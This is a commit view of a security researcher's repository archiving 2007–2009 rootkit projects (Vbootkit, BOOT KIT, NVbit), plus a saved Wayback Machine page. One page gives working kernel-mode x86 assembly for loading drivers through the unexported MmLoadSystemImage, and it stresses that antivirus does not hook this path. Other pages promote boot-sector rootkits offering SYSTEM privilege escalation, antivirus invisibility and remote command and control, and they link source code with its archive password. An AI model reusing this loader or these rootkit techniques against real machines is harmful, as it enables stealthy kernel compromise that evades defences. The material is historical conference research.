Browse Source

the first commit

vkumar 2 years ago

+ 10
- 0 View File

@@ -0,0 +1,10 @@
### Black Hat Europe 2007 & HITB Conf. 2007


Vbootkit White-paper and presentation materials.<br>
The vbootkit white-paper and presentation slides are now online and can be downloaded below.

[Vbootkit Presentation]( <br>
[Vbootkit White Paper](

+ 29
- 0 View File

@@ -0,0 +1,29 @@
### BOOT KIT: Custom boot sector based Windows 2000/XP/2003 Subversion


**BOOT KIT** is a project related to custom boot sector code subverting Windows NT Security Model.The sample presented currently keeps on escalating cmd.exe to system privileges every 30 secs.

**It has several features:**
1. It's very small.The basic framework is just about 100 lines of assembly code.It supports 2000,XP,2003
1. It patches the kernel at runtime(no files are patched on disk).
1. BOOT KIT is PXE-compatible.
1. It can even lead to first ever PXE virus
1. It also enables you to load other root kits if you have physical access(Normally root kits can only be loaded by the administrator

The bootkit has been tested with a number of kernel mode shell codes such as Loading Native Applications and drivers from the shell code another shellcode ,which periodically raises every CMD.EXE to system privileges.

**The Source code will contain 4 levels of BOOT KITs(showcasing different payloads):
1. Basic framework ( Kernel patching has to be done later on) ( available for download )
1. Privilege escalation framework(demonstrates creating new system threads and how to escalate privileges easily) (available for download)
1. Loading drivers and native applications from kernel mode without touching registry
1. PXE compatible code(Basic framework).

Bootkit Basic framework Source Code password nvlabs

Boot Kit Advance Version(support Privilege escalation) Source Code

+ 183
- 0 View File

@@ -0,0 +1,183 @@
### Loading drivers and Native applications from kernel mode, without touching registry

"How to load driver without touching registry from kernel mode", this is asked almost always. Today, I will give you an insight into how Windows loads its driver and then will document a new method to load a driver without touching registry.

This is required because even if you exploit kernel vulnerabilities ,you still cannot load any driver because almost all existing Antivirus solutions hijack the NTOSkrnl API's ( which let you write to specific registry locations, load drivers etc).

The first method to load driver is given below:

Windows NT loads drivers using the following function ZwLoadDriver.

Its declaration is as follows:

NTSTATUS ZwLoadDriver (IN PUNICODE_STRING DriverServiceName);

DriverServiceName: Pointer to a counted Unicode string that specifies a path to the driver's registry key, \Registry\Machine\System\CurrentControlSet\Services\DriverName, where DriverName is the name of the driver

The Second Method is given below:

After Windows 2000 start's up, It starts loading the special driver win2k.sys.It doesn't load in the traditional way (as all other drivers are loaded) by calling the following procedures ZwLoadDriver, NtLoadDriver etc.

It actually loads by the following kernel API ZwSetSystemInformation.

This API is used to set system information such as page file, loads the above driver, file cache( information working set) etc.

It is actually implemented as follows:

//specifies operation to do
IN PVOID SystemInformation, //specifies operation data
IN ULONG SystemInformationLength ) //specifies data length

it's internally implemented as follows:

Switch (SystemInformationClass)
Case 0:

Case 1:
Case 5: ;this actually extends the system service descriptor table

call entrypoint(driverobject,NULL) ;

break ;
case 6:

These 2 are the only known method of loading drivers.

Here is the third method. (No antivirus solution currently hijacks it so it is safe).

As seen above ZwSetSysteminformation loadimage function to load driver into memory and then calls its entry point.

Now we will briefly analyze the parameters and functionality of MmLoadSystemImage

MmLoadSystemImage(UNICODE STRING Imagepath, UNICODE STRING prefix optional,UNICODE STRING basename optional,
ULONG unknown=0,PVOID imagehandle,PVOID baseaddress);

ImagePath is a fully qualified NT style pathname
prefix is added to pathname when loading driver

basename is the name system shows after module has been loaded

unknown is unknown

*imagehandle is the handle to section(it's already referenced, so you will have dereference it at unload)

*baseaddress is the address at which image has been loaded in kernel memory

This function actually loads the image in memory, resolves imports,loads dependencies, etc.

In Windbg,u can find the address of above function using "d MmLoadSystemImage" (of course ,symbols are required)

NOTE:- MmLoadSystemimage internally calls and checks the image after loading it into memory so make sure the checksum for the image is fine.This functionality is done by the MiCheckSystemImage.The import resolving job and dependency loading is done by MiResolveImageReferences API.

Thee MmloadSystemimage works as follows: (PseudoCode)

1) traverse existing module list to check whether it has been alredy loaded
2) if it exists return error (image already loaded STATUS_IMAGE_ALREADY_LOADED) and return from call

3) try to open file using Zwopenfile,if file cannot be opened,just return with error code
4) compute image checksum and match it with checksum stored in header
5) if checksum doesn't matches. return with error code
6) create a section with zwcreatesection and then reference it
7) map it into kernel space using mMapViewInSystemSpace
Cool if necessary apply relocations to image using function LdrRelocateImage
9) resolve refrences iusing MiResolveImageReferences
10) then create an entry in psmoduleloadedlist for the module
11) make it writeprotect
12) then close file handle
13) return from call

So, now we have a function which loads image in memory, but what about calling Driver Entry (entry point of driver). This information can be obtained from the PE headers itself after the image successfully loads in memory. This method has been and can used to load and execute drivers, native applications etc directly from kernel mode

Here is the assembly code (kernel mode assembly code). it has been tested on Windows XP SP0 English Version.After minor modifation code runs on win2k,xp,2k3 etc

__asm {

;below code loads the driver in memory
mov dword [Stack],esp //save stack

;paramters as always are passed in reverse
push DWORD Driverbase ;it stores driver base
push DWORD ImageHandle ;it stores section handle
push dword 0
push dword 0
push dword 0
push DWORD U_STRINGloc ;it points to unicode string containing driver to load

mov edi, 0x805c03ae ;MmLoadSystemImage address function on Win XP SP0 English version,(OS and SP dependent data)
call edi
cmp eax,0 ;check whether driver loaded successfully in memory
jne drivernotloaded ; if loading failed, exit without calling entrypoint

;since driver has loaded successfully call its init function both parameters are passed 0
mov DWORD edi, [Driverbase]
mov DWORD ebx ,[edi + 0x3c] ;to get offset of optional header
mov dword ebx,[edi + ebx + 0x18 + 0x10] ; to get entry point ofset from base of code
add edi ,ebx ; add base + entry point to get entry point in memory
push 0 ;
push 0
call edi ;call entry point (Driver Entry in case of Drivers)

mov dword esp,[ Stack] ; correct stack so as execution continues


; Here data and/or variables are stored

; This is the driver to load including path name

;DosDevices@:hooka.sys length 48
db 0x5c,0x00,0x44,0x00,0x6f,0x00,0x73,0x00,0x44,0x00,0x65,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,
db 0x42,0x00,0x3a,0x00,0x5c,0x00,0x68,0x00,0x6f,0x00,0x6f,0x00,0x6b,0x00,0x61,0x00,0x2e,0x00,0x73,0x00,

;it's used to store driver base address
dd 0
;it's used to store section handle
dd 0;

;it is used to store Stack location
dd 0

;structure used for unicode strings in memory
struc U_STRING
Length: resw 1
MaximumLength: resw 1
Buffer: resd 1


//asm code ends here

NOTE: - These API's or functions are not exported by NTOSKRNL, but these exist for internal usage.These functions are not hooked by any anti-virus solutions, so these can be used to load drivers and native application and then run them.

That's all about loading a driver from kernel mode without touching registry.
Also,the code does some error checking,so as no hard error occurs.

Have fun!

+ 14
- 0 View File

@@ -0,0 +1,14 @@
**NVbit : Accessing Bitlocker volumes from linux**


**This projects details the Internals/Implementaion of BitLocker Encryption system for Vista.**<br>
NVbit is a linux fuse driver to access Windows Vista's Bitlocker Volumes from linux, provided you have the right keys. A white-paper and supporting presentation is also available.The research was done around an year ago.Work was stopped prematurely,Don't expect things in clean/finished shape.The code is in alpha state. <br>

Both the paper and presentation are incomplete draft versions. However, missing things can be referred from nvbit source code. NVbit allows read-only access.(Though writing can be done just in reverse order but still it doesn't exist for now).

[NVbit source sode](

[NVbit Bitlocker presentation](

[NVbit Bitlocker white_paper](

+ 25
- 0 View File

@@ -0,0 +1,25 @@
This repository contains list of public projects kumar have worked upon since 2005. <br>
Old website links have broken but you can find most of the releases here.

|2007 JAN |[Loading drivers and Native applications from kernel mode, without touching registry](|
|2007 FEB| [BOOT KIT: Custom boot sector based Windows 2000/XP/2003 Subversion](|
|2007 APRIL|[Vbootkit in action : Screenshots and Videos](|
|2007 APRIL |[Black Hat Europe 2007 and HITB Conf. 2007](|
|2008 MAY| [ NVbit : Accessing Bitlocker volumes from linux](|
|2009 MAR | [Vbootkit 2.0: Attacking Windows 7 via Boot Sectors](|
|2009 MAY | [Vbootkit 2.0 is open-source(GPL license)](|

<br> <br>

Kumar likes to work on Reverse Engg. , Protocol Analysis, Crypto Analysis, Hardware Analysis and similar interesting technologies.

Cont@ct: vkumar @@

+ 21
- 0 View File

@@ -0,0 +1,21 @@
### Vbootkit in action : screenshots and videos


Vbootkit in action.



![BOOTMGR Control](

Automatic privilege escalation to SYSTEM
![Automatic privilege escalation to SYSTEM](
SYSTEM rights in Process Explorer<br>
![SYSTEM rights in Process Explorer](

+ 22
- 0 View File

@@ -0,0 +1,22 @@
### Vbootkit 2.0: Attacking Windows 7 via Boot Sectors


This talk will introduce a new tool which allows attacks against Windows 7 via boot sectors. In this talk we will demo Vbootkit 2.0 in action and show how to bypass and circumvent security policies / architecture using customized boot sectors for Windows 7 (x64).<br>
The talk will cover:
1. Windows 7 Boot architecture
1. Vbootkit 2.0 architecture and inner workings
1. insight into the Windows 7 minkernel

We will also demonstrate:
1. The use of Vbootkit in gaining access to a system without leaving traces
1. Leveraging normal programs to escalate system privileges
1. Running unsigned code in kernel
1. Remote command & Control

All this is done, without having any footprint on the HDD (everything is in memory). It also remains invisible to all existing anti-virus solutions.

[Vbootkit 2.0 Attacking Windows 7 (x64) via Boot Sectors](

Vbootkit 2.0 [source]( is available under open-source under GPL license.

+ 167
- 0
download/nitin_vipin_vista_vbootkit.ppt View File

@@ -0,0 +1,167 @@
<!DOCTYPE html>
<title>Wayback Machine</title>
<script src="//" type="text/javascript"></script>
<script type="text/javascript">window.addEventListener('DOMContentLoaded',function(){var v=archive_analytics.values;v.service='wb';v.server_name='';v.server_ms=601;archive_analytics.send_pageview({});});</script><link rel="stylesheet" type="text/css" href="/_static/css/banner-styles.css" />
<link rel="stylesheet" type="text/css" href="/_static/css/iconochive.css" />
<script src="/_static/js/jquery-1.11.1.min.js"></script>
<body style="overflow:hidden;">
<script type="text/javascript" src="/_static/js/timestamp.js" charset="utf-8"></script>
<script type="text/javascript" src="/_static/js/graph-calc.js" charset="utf-8"></script>
<script type="text/javascript" src="/_static/js/auto-complete.js" charset="utf-8"></script>
<script type="text/javascript" src="/_static/js/toolbar.js" charset="utf-8"></script>
<style type="text/css">
body {
margin-top:0 !important;
padding-top:0 !important;
/*min-width:800px !important;*/
.wb-autocomplete-suggestions {
text-align: left; cursor: default; border: 1px solid #ccc; border-top: 0; background: #fff; box-shadow: -1px 1px 3px rgba(0,0,0,.1);
position: absolute; display: none; z-index: 2147483647; max-height: 254px; overflow: hidden; overflow-y: auto; box-sizing: border-box;
.wb-autocomplete-suggestion { position: relative; padding: 0 .6em; line-height: 23px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; font-size: 1.02em; color: #333; }
.wb-autocomplete-suggestion b { font-weight: bold; }
.wb-autocomplete-suggestion.selected { background: #f0f0f0; }
<div id="wm-ipp-base" lang="en" style="display:none;direction:ltr;">
<div id="wm-ipp" style="position:fixed;left:0;top:0;right:0;">
<div id="wm-ipp-inside">
<div style="position:relative;">
<div id="wm-logo" style="float:left;width:130px;padding-top:10px;">
<a href="/web/" title="Wayback Machine home page"><img src="/_static/images/toolbar/wayback-toolbar-logo.png" alt="Wayback Machine" width="110" height="39" border="0" /></a>
<div class="r" style="float:right;">
<div id="wm-btns" style="text-align:right;height:25px;">
<div id="wm-save-snapshot-success">success</div>
<div id="wm-save-snapshot-fail">fail</div>
<a href="#"
onclick="__wm.saveSnapshot('', '20180823185339')"
title="Share via My Web Archive"
<span class="iconochive-web"></span>
<a href=""
title="Sign In"
<span class="iconochive-person"></span>
<span id="wm-save-snapshot-in-progress" class="iconochive-web"></span>
<a href="" title="Get some help using the Wayback Machine" style="top:-6px;"><span class="iconochive-question" style="color:rgb(87,186,244);font-size:160%;"></span></a>
<a id="wm-tb-close" href="#close" onclick="__wm.h(event);return false;" style="top:-2px;" title="Close the toolbar"><span class="iconochive-remove-circle" style="color:#888888;font-size:240%;"></span></a>
<div id="wm-share" style="text-align:right;">
<a href="#" onclick="'', '', 'height=400,width=600'); return false;" title="Share on Facebook" style="margin-right:5px;" target="_blank"><span class="iconochive-facebook" style="color:#3b5998;font-size:160%;"></span></a>
<a href="#" onclick="';via=internetarchive', '', 'height=400,width=600'); return false;" title="Share on Twitter" style="margin-right:5px;" target="_blank"><span class="iconochive-twitter" style="color:#1dcaff;font-size:160%;"></span></a>
<table class="c" style="">
<td class="u" colspan="2">
<form target="_top" method="get" action="/web/submit" name="wmtb" id="wmtb"><input type="text" name="url" id="wmtbURL" value="" onfocus="this.focus();;" /><input type="hidden" name="type" value="replay" /><input type="hidden" name="date" value="20180823185339" /><input type="submit" value="Go" /></form>
<td class="n" rowspan="2" style="width:110px;">
<tr class="m">
<td class="b" nowrap="nowrap"><a href="" title="13 Apr 2018"><strong>Apr</strong></a></td>
<td class="c" id="displayMonthEl" title="You are here: 18:53:39 Aug 23, 2018">AUG</td>
<td class="f" nowrap="nowrap"><a href="" title="26 Jul 2019"><strong>Jul</strong></a></td>
<tr class="d">
<td class="b" nowrap="nowrap"><a href="" title="01:09:29 Apr 13, 2018"><img src="/_static/images/toolbar/wm_tb_prv_on.png" alt="Previous capture" width="14" height="16" border="0" /></a></td>
<td class="c" id="displayDayEl" style="width:34px;font-size:24px;white-space:nowrap;" title="You are here: 18:53:39 Aug 23, 2018">23</td>
<td class="f" nowrap="nowrap"><a href="" title="11:07:13 Jul 26, 2019"><img src="/_static/images/toolbar/wm_tb_nxt_on.png" alt="Next capture" width="14" height="16" border="0" /></a></td>
<tr class="y">
<td class="b" nowrap="nowrap"><a href="" title="08 Apr 2017"><strong>2017</strong></a></td>
<td class="c" id="displayYearEl" title="You are here: 18:53:39 Aug 23, 2018">2018</td>
<td class="f" nowrap="nowrap">2019</td>
<td class="s">
<div id="wm-nav-captures">
<a class="t" href="/web/20180823185339*/" title="See a list of every capture for this URL">10 captures</a>
<div class="r" title="Timespan for captures of this URL">21 Jul 2011 - 26 Jul 2019</div>
<td class="k">
<a href="" id="wm-graph-anchor">
<div id="wm-ipp-sparkline" title="Explore captures for this URL" style="position: relative">
<canvas id="wm-sparkline-canvas" width="600" height="27" border="0"></canvas>
<div style="position:absolute;bottom:0;right:2px;text-align:right;">
<a id="wm-expand" class="wm-btn wm-closed" href="#expand" onclick="__wm.ex(event);return false;"><span id="wm-expand-icon" class="iconochive-down-solid"></span> <span style="font-size:80%">About this capture</span></a>
<div id="wm-capinfo" style="border-top:1px solid #777;display:none; overflow: hidden">
<div style="background-color:#666;color:#fff;font-weight:bold;text-align:center">COLLECTED BY</div>
<div style="padding:3px;position:relative" id="wm-collected-by-content">
<div style="display:inline-block;vertical-align:top;width:50%;">
<span class="c-logo" style="background-image:url(;"></span>
Organization: <a style="color:#33f;" href="" target="_new"><span class="wm-title">Internet Archive</span></a>
<div style="max-height:75px;overflow:hidden;position:relative;">
<div style="position:absolute;top:0;left:0;width:100%;height:75px;background:linear-gradient(to bottom,rgba(255,255,255,0) 0%,rgba(255,255,255,0) 90%,rgba(255,255,255,255) 100%);"></div>
The Internet Archive discovers and captures web pages through many different web crawls.

At any given time several distinct crawls are running, some for months, and some every day or longer.

View the web archive through the <a href="">Wayback Machine</a>.
<div style="display:inline-block;vertical-align:top;width:49%;">
<span class="c-logo" style="background-image:url("></span>
<div>Collection: <a style="color:#33f;" href="" target="_new"><span class="wm-title">Wide Crawl Number 17: Started August 3rd, 2018 - Still running</span></a></div>
<div style="max-height:75px;overflow:hidden;position:relative;">
<div style="position:absolute;top:0;left:0;width:100%;height:75px;background:linear-gradient(to bottom,rgba(255,255,255,0) 0%,rgba(255,255,255,0) 90%,rgba(255,255,255,255) 100%);"></div>
<div><span style="font-size: 16px; font-family: Arial;">Wide17 was seeded with the "Total Domains" list of 256,796,456 URLs provided by&nbsp;</span><span style="font-size: 16px; font-family: Arial;"><a href="">Domains Index</a>&nbsp;</span><span style="font-size: 16px; font-family: Arial;">on June 26th, and crawled with max-hops set to "3" and de-duplication set "on".</span><br style="font-size: 16px; font-family: Arial;"></div><div>&nbsp;&nbsp;</div>
<div style="background-color:#666;color:#fff;font-weight:bold;text-align:center" title="Timestamps for the elements of this page">TIMESTAMPS</div>
<div id="wm-capresources" style="margin:0 5px 5px 5px;max-height:250px;overflow-y:scroll !important"></div>
<div id="wm-capresources-loading" style="text-align:left;margin:0 20px 5px 5px;display:none"><img src="/_static/images/loading.gif" alt="loading" /></div>
</div></div></div></div><script type="text/javascript">,27,25,2,"web","","2018-08-23",1996,"/_static/",['css/banner-styles.css','css/iconochive.css']);
<!-- END WAYBACK TOOLBAR INSERT --><iframe id="playback" src="" frameborder="0" style="position:absolute;top:65px;left:0;width:100%;">
<script type="text/javascript">
var margin_top = 65;
function fitPlayback() {
height: (window.innerHeight - margin_top) + 'px',
top: margin_top
$(window).on('resize', function() {
margin_top = 0;

download/nitin_vipin_vista_vbootkit_poc_RC1_edited_video.avi View File

download/nitin_vipin_vista_vbootkit_poc_RC2_video.avi View File

download/ View File

download/nvbit_bitlocker_presentation.pdf View File

download/nvbit_bitlocker_white_paper.pdf View File

download/vbootkit2.0-AttackingWindows7viaBootSectors.odp View File

download/ View File

download/vbootkit_nitin_vipin_whitepaper.pdf View File

images/screen_bootmgr.JPG View File

Before After
Width: 1024  |  Height: 768  |  Size: 53KB

images/screen_system_cmd.jpg View File

Before After
Width: 800  |  Height: 600  |  Size: 414KB

images/screen_system_procexp.jpg View File

Before After
Width: 800  |  Height: 600  |  Size: 394KB

images/system.jpg View File

Before After
Width: 800  |  Height: 600  |  Size: 111KB